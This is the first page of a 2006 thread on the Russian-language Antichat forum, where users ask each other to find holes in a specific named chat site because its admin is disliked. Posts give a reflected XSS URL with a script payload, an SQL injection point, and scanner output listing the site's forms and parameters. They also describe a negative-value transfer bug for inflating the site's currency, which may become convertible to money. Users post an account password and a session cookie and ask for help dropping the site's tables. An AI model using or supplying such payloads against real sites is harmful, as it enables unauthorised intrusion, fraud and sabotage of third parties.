Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Проверьте пожалуйста на уязвимость чат www.bazar.co.ua (https://forum.antichat.xyz/showthread.php?t=16297)

pain_zl0 22.03.2006 11:27
Проверьте пожалуйста на уязвимость чат www.bazar.co.ua
 
Проверьте чат www.bazar.co.ua на уязвимости, я б сам бы рад попыхтеть над ним, вот время не позволяет, админ редкая сволочь, вобще оборзел.

max_pain89 22.03.2006 12:08
Вот пассивная ХСС http://www.bazar.co.ua/?error[]=<script>confirm(/xxx/)</script>

Ошибка SQL однако бесполезная, тут идет фильтрация

http://chat.bazar.co.ua/photo/show.p...983&photo=-999

DRON-ANARCHY 22.03.2006 23:01
Так лень было вручную искать....что прибег к помощи сами знаете чего=)

Цитата:
Ссылка - _http://www.bazar.co.ua/robots.txt
Содержание : информация
Цитата:
Ссылка - _http://www.bazar.co.ua/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
Содержание : информация о PHP
если че еще нарою-выложу


Вот есть список ссылок с параметрами и список форм..

Цитата:
Список форм использующихся для передачи данных на сервер:

POST / HTTP/1.1
action=&login=&password=&sex=&sex=&sex=&input_colo r=&input_color=&input_color=&input_color=

POST /etc/opros/index.php HTTP/1.1
id=&do=&answer=&answer=&answer=&answer=&answer=&an swer=&answer=&answer=

POST /games/roulette.php HTTP/1.1
action=&session=&cvet_pay=&cvet=&chet_pay=&chet=&c olumn_pay=&column=&dozen_pay=&dozen=

POST /index.php HTTP/1.1
action=&login=&password=&input_color=&input_color= &input_color=&input_color=&input_color=&input_colo r=&input_color=

POST /lost_password.php HTTP/1.1
do=&log=&email=

POST /feedback.php HTTP/1.1
email=&sendform=

POST /games/slot-mashine.php HTTP/1.1
action=&session=&pay=
Цитата:
Список ссылок найденных на веб-сервере, которые используют какие-либо параметры:

/enter.php?action=1&login=1&password=1&input_color= 1&input_color=1&input_color=1&input_color=1&input_ color=1&input_color=1&input_color=1

/forum2/message.php?theme_id=1494&subtheme_id=1302&guest=y es

/forum2/message.php?theme_id=1494&subtheme_id=1302

/forum2/theme.php?subtheme_id=1302&guest=yes

/etc/advertisement/click.php?id=103

/photo/show.php?user_id=184669

/frame/rating.php?user_id=

/etc/zzz/click.php?id=108

/etc/opros/?do=result

/photo/show.php?cat=m

/forum2/?guest=yes

/games/?game=2

/games/?cat=0
ну да..вот скуль _http://www.bazar.co.ua/forum2/message.php?theme_id=1'&subtheme_id=1302&guest=yes
PS зырить исходники...

pain_zl0 23.03.2006 16:19
вот еще что, в это чатике есть своя валюта - основная и игровая (конвертить можна только основную в игровую), основную пополнить можна смской, трансфером (т.е от одного пользователя к другому) или через вебмани; игровая - само название говорит за себя, пополнить можна выиграшем или трансфером.

Платить за разные функции чата можна и той и той валютой, но эт неважно, важно то что в скором времени "основными" можна будет платить не только за чатовские функции, но и другие, та что меня заинтересовала - переводить их обратно в вебмони, , вот это уже веселей)))

смс - очень сложно что-то придумать так, как связь идет через оператора связи к серверу без использования пользователя...

ломать игры ...это несерйозно...

а вот над трансфером можна поработать, если успею то выложу, то что успел нарыть...
просто ща не в своем родном городе:)...как приеду отзовусь....

DRON-ANARCHY 23.03.2006 20:31
Вот как наступит "скорое время", так и отзовись=))

FigaSS 28.04.2006 13:58
С трансфером есть глюк)))
На сумму есть свой диапозон, здесь он сравнительно маленький))
Так что, если при переводе из основных в игровые вводите -9999999, (курс 5:1), и вертите с ними пока из нуля или минуса не превратиться в хорошенькую сумму))))Пояснение - Нет проверки на превышение диапозона))))
Позже выложу алгоритм))))
И не нада ниче ломать))))
Ломать нада было раньше, во всех играх не было проверки на ставку меньше 0, просто даже Инеткряком посылать переменную ставки меньше 0, ну а икряк я взял для того чтоб обойти ставку, т.к. на самой страничке ставка выбирается из списка))))
Суть - нада проиграть, то есть вы проигрываете -x)))
Админ уже закрыл эту дИрочку....кому интересна просто почитайте какую ошибку выдает сервер)))))

FigaSS 28.04.2006 14:01
Помогите иньекнуть enter.php

FigaSS 28.04.2006 15:50
...или что нить подкиньте, какую нить дырочку)))))
Если канечна не сложна
вот
логин 4i4en
пасворд 12345

nico 18.06.2006 14:34
народ прошу совета. до недавнего времени при регистрации нового ника использовалась ламерская проверка от аврорегистрации, но пару дней назад админ в злости поставил проверку, используя супер-бан. как можно программно съемулировать строку этого супер-бана, чтобы программно можно было войти? даже сохраняя стр. на диск не получается обойди запрет.
и еще вопрос-никак не врублюсь, как происходит отсылка сообщений в чат. там нет сабмита и как-то пишется в фрейм. можно ли съемулировать отсылку пост или гет запросом?
а лучше б конечно ломануть его, ну или снести хотяб пару таблиц

Антошка2003 18.06.2006 21:22
Цитата:
GET http://www.bazar.co.ua/frame/get.php...11506504855831 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ssf, */*
Referer: http://www.bazar.co.ua/enter.php
Accept-Language: et
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.bazar.co.ua
Cookie: b=b; e-rate=yes; user_login=4i4en; user_sex=m; user_color=414141; user_room=0; chat_session=fa993200efe236f9966b630b9298617a
Naviscope перехватил такой пакет отправки сообщений.

по поводу нет submit я не понял, у тебя что имеються исходники этого чата?


Время: 12:39
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице